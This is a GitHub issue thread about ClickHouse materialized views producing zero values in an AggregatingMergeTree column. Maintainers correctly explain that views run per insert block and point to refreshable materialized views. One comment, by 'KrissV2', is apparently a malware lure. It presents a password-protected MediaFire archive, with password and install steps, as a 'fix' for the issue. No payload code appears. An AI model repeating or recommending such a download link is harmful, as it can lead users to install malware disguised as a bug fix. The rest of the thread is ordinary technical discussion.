### ISSUE TITLE
Field inserted in AggregatingMergeTree is set to 0

### ISSUE THREAD

**Issue by matthieubc** [ClickHouse/ClickHouse#69122]
**Describe the unexpected behaviour**
Inserting data in a `AggregatingMergeTree` (using a Materialized view trigger with `TO`), one of the attributes value is not expected (set to 0). Full scenario in link below.

**How to reproduce**
https://fiddle.clickhouse.com/1f7b8d92-ab8a-4c33-b7df-bcd24da6599f

**Expected behavior**
The `rangeseqnum` value in `ais_draught` view is expected to have values != 0; actually the same values that are seen in 
```
SELECT
    mmsi, draught, time, inserttime,
    (row_number() OVER (PARTITION BY mmsi ORDER BY time ASC) - row_number() OVER (PARTITION BY mmsi, draught ORDER BY time ASC)) as rangeseqnum 
FROM ais_draught_raw;
```

**Error message and/or stacktrace**
No errors

**Additional context**
Built from:
- https://clickhouse.com/docs/en/engines/table-engines/mergetree-family/aggregatingmergetree
- https://stackoverflow.com/questions/68707278/group-by-and-aggregate-when-colums-change-over-time-in-clickhouse/68711524#68711524

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by den-crane** [comment]
Because MatView is an insert trigger and at sees each row separately in your inserts. 
https://den-crane.github.io/Everything_you_should_know_about_materialized_views_commented.pdf

For example if I change the insert https://fiddle.clickhouse.com/049e1384-206e-44aa-b5e1-2da199846478

Try https://clickhouse.com/docs/en/materialized-view/refreshable-materialized-view

**Comment by Algunenano** [comment]
What Den said. Materialized views work per insert block, not for whole tables, so you are getting values per insert.

**Comment by matthieubc** [comment]
Indeed, that makes sense now thank you. I'll look into refreshable MV or another design to make it work.
